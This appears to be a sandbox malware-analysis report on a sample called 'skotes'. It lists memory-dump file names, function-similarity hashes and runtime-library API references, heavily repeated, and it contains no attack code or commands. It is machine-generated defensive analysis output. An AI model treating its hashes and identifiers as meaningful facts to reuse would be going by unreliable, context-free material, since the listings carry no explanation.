• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
• String ID:
• API String ID: 3010677857-0
• Opcode ID: 49abb832542600c08338a52b183585b97a2d08aefa2c782530a78c6f26785b76
• Instruction ID: aa1a328d524611cdb616a8d7dde6f187e0fb61491f0365426c94c376ed0560fa
• Opcode Fuzzy Hash: 49abb832542600c08338a52b183585b97a2d08aefa2c782530a78c6f26785b76
• Instruction Fuzzy Hash: 83817EF0A11B62BAD748EF748445BD9FBA9BF09700F10421EF52897281DBB4A660CBD5
APIs
• __EH_prolog3_GS.LIBCMT ref: 006AECED
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 006AED17
  • Part of subcall function 006AF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 006AF3FA
• __alloca_probe_16.LIBCMT ref: 006AED53
• Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 006AED94
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 006AEDC6
• __freea.LIBCMT ref: 006AEDEC
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
• String ID:
• API String ID: 1319684358-0
• Opcode ID: 8c616796b3954904296038db12ff8d3602f22b14b9f4e6271fefe8b7eb44d81b
                                                                                                                                                                                                                                          • Instruction ID: 4d764e5c48324f0c5b1191037f73d3098c1389f8d4bf2d86146803e79e1cbc4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c616796b3954904296038db12ff8d3602f22b14b9f4e6271fefe8b7eb44d81b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E316D71E002058BDB15FFA8C9416EEB7F6AF4A310B24406EE445E7351DB759E028F95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID: vl
                                                                                                                                                                                                                                          • API String ID: 3213747228-3645925279
                                                                                                                                                                                                                                          • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction ID: bf3f50399607ca427c2d8a53b31435ac0948c388bf40e27d1b47b3f6881d54bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7B103329046459FDB11CF68C841FFEBBA6EF4A360F1441AEE859DB341D6349D42CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 006C1B57
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C1B66
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C1C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
• String ID: pContext$switchState
• API String ID: 2656283622-2660820399
• Opcode ID: 8a897c565e5d806abb3cb20c84800010b846a0c923153de145e2d723b40b1bf3
• Instruction ID: acdf9818a8ae802395152e91049243edacface1cee6b0af33b0f966a46bdc3eb
• Opcode Fuzzy Hash: 8a897c565e5d806abb3cb20c84800010b846a0c923153de145e2d723b40b1bf3
• Instruction Fuzzy Hash: A2318F35A00214ABCB04EB64C895EBDB3B7EF47310F21856DE9119B392EB75EE01CA94
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 006C4E6D
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 006C4E86
• PMDtoOffset.LIBCMT ref: 006C4EAC
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID: Bad dynamic_cast!
• API String ID: 1467055271-2956939130
• Opcode ID: b34934bfbb5fe86962fd8fe43aaa00fac2a345866b776578efce6466600b738b
• Instruction ID: c7efd574792f08d5da63b306a89788fcb5e7c21d88dd7de520f0f2a65b3e4017
• Opcode Fuzzy Hash: b34934bfbb5fe86962fd8fe43aaa00fac2a345866b776578efce6466600b738b
• Instruction Fuzzy Hash: 7521C472A04205AFCB24DFA8DD56FBA77BAFF98720B11811DF91197280DF31ED008695
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: _wcsrchr
• String ID: .bat$.cmd$.com$.exe
• API String ID: 1752292252-4019086052
• Opcode ID: e86a1e8911ad4873e749128841ad76e8564544bd419660f2f02278a739e49c76
• Instruction ID: da3b71ff8606f729845141cd3f120be22311217cd8dc8bf44e67a84a085dd7cd
• Opcode Fuzzy Hash: e86a1e8911ad4873e749128841ad76e8564544bd419660f2f02278a739e49c76
• Instruction Fuzzy Hash: D101C8277087A725661510599D03FB7179BCBC1BB4B1A402EFC58FB3C1DF54DC4265A8
APIs
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006AFB06
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
